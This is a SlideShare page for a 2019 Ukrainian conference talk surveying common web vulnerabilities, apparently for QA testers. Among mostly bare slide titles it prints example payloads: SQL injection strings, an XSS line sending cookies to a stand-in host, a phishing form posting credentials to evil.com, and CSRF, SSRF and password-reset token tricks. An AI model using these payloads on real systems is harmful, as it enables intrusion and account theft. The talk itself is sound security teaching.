Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.
KYIV 2019
Короленко Сергій
Всі вразливості у веб додатках
Bugcrowd’s Vulnerability Rating Taxonomy
RCE
Remote Code Execution | Code injection
RCE
Remote Code Execution | Code injection
SQL Injection
SQL Injection
SQL Injection
SQL Injection
SQL Injection
Stacked queries
UNION query-based
Error-based
Boolean-based blind
Time-based blind
1 AND (ascii(substr((SELECT version()),...
XXE |XML external entity injection
FILE INCLUSION
<?php
$file = $_GET[«file»];
include(“/var/www/backend/$file”);
?>
https://example.com/?page=contact.php
DIRECTORY TRAVERSAL
UNSAFE FILE UPLOAD
UNSAFE FILE UPLOAD
CRLF injection
(CRLF, rn, %0A%0D)
HTML Injection
Hi! My name is <h1>hacker</h1>
Hello
HACKER
Hi! My name is <h1>Log in to view a content</h1>
<form action="...
XSS | Cross Site Scripting
XSS Stored/Reflected
XSS | Cross Site Scripting
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</sc...
Open Redirection
https://bank.com/redirect.php?go=http://attacker.com/phish/
http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280
http://bank.com/transfer?amount=50.0&from=4165**...
CSRF | Cross-Site Request Forgery
SSRF| Server Side Request Forgery
http://example.com/?url=http://localhost/server-status
Default Credentials/Configuration
Authentication Bypass
Weak Password Policy
Weak password reset question/answer
Weak password change/reset
http://bank.com/reset_password?email=ololo@example.com&token=1561324612
http://bank.com/reset_p...
Bypass 2FA
Privilege Escalation
Broken Access Control
http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
COOKIES Attributes
Session Fixation
Password

API Keys

/.git/
Sensitive Data Exposure
Directory Listing DirSearch (backups, logs, etc.)
Unencrypted Communication
Privileged user: uid=0(root)
No Rate Limits
CAPTCHA Bypass
Security Headers
•Server headers that protect against attacks
◦HTTP Strict Transport Security
◦Content Security Policy
◦Ac...
Detailed Error
https://www.youtube.com/OWASPKyiv
https://www.facebook.com/owaspkyiv
https://owasp.slack.com/messages/chapter-ua/
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
Nächste SlideShare
Wird geladen in …5
×

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

76 Aufrufe

Veröffentlicht am

Поговоримо про найпопулярніші помилки, яких припускаються розробники веб додатків, та як зловмисник може використати їх на свою користь. Охопимо максимальну кількість матеріалу за короткий проміжок часу.

Veröffentlicht in: Bildung
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

  1. 1. KYIV 2019 Короленко Сергій Всі вразливості у веб додатках
  2. 2. Bugcrowd’s Vulnerability Rating Taxonomy
  3. 3. RCE Remote Code Execution | Code injection
  4. 4. RCE Remote Code Execution | Code injection
  5. 5. SQL Injection
  6. 6. SQL Injection
  7. 7. SQL Injection
  8. 8. SQL Injection
  9. 9. SQL Injection
  10. 10. Stacked queries UNION query-based Error-based Boolean-based blind Time-based blind 1 AND (ascii(substr((SELECT version()),1,1))) > 52— 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)— 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- 1 UNION ALL SELECT NULL,version()-- 1; SELECT version()-- SQL Injection
  11. 11. XXE |XML external entity injection
  12. 12. FILE INCLUSION <?php $file = $_GET[«file»]; include(“/var/www/backend/$file”); ?> https://example.com/?page=contact.php
  13. 13. DIRECTORY TRAVERSAL
  14. 14. UNSAFE FILE UPLOAD
  15. 15. UNSAFE FILE UPLOAD
  16. 16. CRLF injection (CRLF, rn, %0A%0D)
  17. 17. HTML Injection Hi! My name is <h1>hacker</h1> Hello HACKER Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>
  18. 18. XSS | Cross Site Scripting
  19. 19. XSS Stored/Reflected
  20. 20. XSS | Cross Site Scripting www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
  21. 21. Open Redirection https://bank.com/redirect.php?go=http://attacker.com/phish/
  22. 22. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280 http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483 CSRF | Cross-Site Request Forgery
  23. 23. CSRF | Cross-Site Request Forgery
  24. 24. SSRF| Server Side Request Forgery http://example.com/?url=http://localhost/server-status
  25. 25. Default Credentials/Configuration
  26. 26. Authentication Bypass
  27. 27. Weak Password Policy
  28. 28. Weak password reset question/answer
  29. 29. Weak password change/reset http://bank.com/reset_password?email=ololo@example.com&token=1561324612 http://bank.com/reset_password?email=ololo@example.com&token=1561324754 http://bank.com/reset_password?email=ololo@example.com&token=1561324698 MD5 ("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36
  30. 30. Bypass 2FA
  31. 31. Privilege Escalation
  32. 32. Broken Access Control http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
  33. 33. COOKIES Attributes
  34. 34. Session Fixation
  35. 35. Password API Keys /.git/ Sensitive Data Exposure
  36. 36. Directory Listing DirSearch (backups, logs, etc.)
  37. 37. Unencrypted Communication
  38. 38. Privileged user: uid=0(root) No Rate Limits CAPTCHA Bypass
  39. 39. Security Headers •Server headers that protect against attacks ◦HTTP Strict Transport Security ◦Content Security Policy ◦Access-Control-Allow-Origin ◦X-FrameOptions ◦X-XSS-Protection ◦X-Content-Type-Options •Server headers that leak information ◦Server ◦X-Powered-By ◦X-AspNet-Version
  40. 40. Detailed Error
  41. 41. https://www.youtube.com/OWASPKyiv https://www.facebook.com/owaspkyiv https://owasp.slack.com/messages/chapter-ua/

×